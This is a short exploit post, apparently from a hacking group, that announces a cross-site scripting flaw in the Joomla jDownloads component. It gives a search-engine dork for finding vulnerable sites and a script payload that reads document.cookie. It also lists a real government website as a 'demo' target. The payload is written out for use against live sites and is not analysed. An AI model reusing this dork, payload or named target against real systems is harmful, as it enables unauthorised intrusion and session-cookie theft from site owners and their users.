#####################################
Title:com_jdownloads xss Vulnerability
#####################
##############################################################
__ __ _____ _ ______ ______ _______ _____
| \/ | /\ | __ \| | | ____| ____|__ __/ ____|
| \ / | / \ | | | | | | |__ | |__ | | | (___
| |\/| | / /\ \ | | | | | | __| | __| | | \___ \
| | | |/ ____ \| |__| | |____| |____| |____ | | ____) |
|_| |_/_/ \_\_____/|______|______|______| |_| |_____/
##############################################################
#Author:Darksnipper & Dream.killer
#Email:Darksnipper@live.com
#####################################
#Home:- www.MadLeeTs.com
#####################################
Vendor Link:Www.jdownloads.com
Dork:-inurl:"component/jdownloads/search"
Tested On:- Windows 7,Linux,Windows xp
######################################################################
#P.o.c
http: //127.0.0.1/components/jdownloads/search
payload
<script>alert(document.cookie)</script>
Demo:-
http://dsya.goa.gov.in/component/jdownloads/search
payload:-
<script>alert(document.cookie)</script>
########################################################################
Greetz:Dream.killer,Soul~inj3ct0r,Error Haxor,Fazil
Mir,Force-Ex,x3o-1337,Shadow008,1337,H4x0rl1f3,Invectus,Sahrawi
Hacker,HaXor KaKKa,Retno Pro, Tr4ck3r,b0x,Gujjar Pcp,madc0de Haxor,P4k
Command3r,Pain006,Anon DeXter,MindCracker,Ap3x Pr3d1at0r,Ment@l
Mind,Sujit Ujale,All Madleets Members,Kashmiri Hackers & All Freedom
Fighters.
########################################################################
